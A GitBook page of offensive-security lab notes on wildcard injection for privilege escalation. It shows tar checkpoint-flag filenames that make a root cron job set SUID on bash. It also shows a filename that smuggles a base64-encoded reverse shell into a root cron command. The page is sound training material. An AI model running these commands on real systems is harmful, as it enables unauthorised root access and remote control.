Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  1. Menu
  2. Vulnerability Methods

Wildcard Injection

If a command is calling for a wildcard we may be able to inject a command instead. Example of a command that calls for

tar -cf /opt/backups/website.tar *

From OffSec

With the cron backup script and our write access to the webroot, we can trick the tar command into running arbitrary commands as root using a wildcard injection. This works by using the --checkpoint and --checkpoint-action flags accepted by tar. If we create files in the webroot with names that are arguments for the tar command, they will be interpreted as arguments instead of filenames.

First, let's move into the webroot and create a file on the target named exploit.sh with a simple command to set SUID on /bin/bash.

<site-editor/editor/extensions/pagebuilder/includes$ cd /var/www/html
cd /var/www/html
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$

We then create two empty files using touch. The first will cause tar to cause a checkpoint on every file and the second will tell tar to execute our exploit.sh with bash on every checkpoint.

alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
touch ./"--checkpoint-action=exec=bash exploit.sh"

After a few minutes, we check if the cron job has run and if SUID is set on /bin/bash.

alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
alice@readys:/var/www/html$

We can now execute bash with SUID to gain a root shell on the target.

alice@readys:/var/www/html$ /bin/bash -p
/bin/bash -p
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
whoami
root

Example 2

/etc/cron.d/wpclean:*/5 * * * * root /usr/bin/find . -type f -not -regex '.*\.\(jpg\|jpegcd /\|png\|gif\)' -exec bash -c "rm -f {}"

The command above runs every 5 minutes by root. We want to insert ourselves into the command to get a root reverse shell. I went to the folder in question (wp uploads) and created a file with:

touch ./"file.exe; echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40OS4yMjMvODg4OCAwPiYx | base64 -d | bash"

I set my listener like normal and once the 5 minutes were done, the command ran and toward the end essentially it ran rm -f file.exe; echo c2ggLWkgPi.... giving me root on the reverse shell.

PreviousSSRF (Server-Side Request Forgery)NextTools of the Trade

Last updated 3 years ago